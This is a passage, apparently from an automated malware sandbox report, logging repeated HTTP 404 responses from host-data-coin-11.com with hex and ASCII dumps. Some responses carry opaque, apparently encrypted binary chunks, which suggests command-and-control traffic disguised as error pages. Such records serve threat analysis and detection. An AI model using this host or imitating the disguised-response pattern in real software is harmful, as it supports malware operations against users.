3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b5 50 db 41 d4 fd 25 8d 2a ed aa 96 56 2b e3 b1 48 22 e3 b3 b7 6c f6 9e b8 5e a9 77 96 c4 30 41 56 39 0f 4c da bb 4d b3 f2 40 84 a0 c3 00 c6 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XPA%*V+H"l^w0AV9LM@`i0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4c ee af 88 70 bc 57 dd 42 d0 fc 25 84 26 e8 c3 90 52 2e ee a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9LpWB%&R.c0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 02:23:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 55 3f 41 be f2 d8 fc fb 43 fc 53 cd 76 bb 44 10 99 04 e1 fa 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OU?ACSvDg2P0
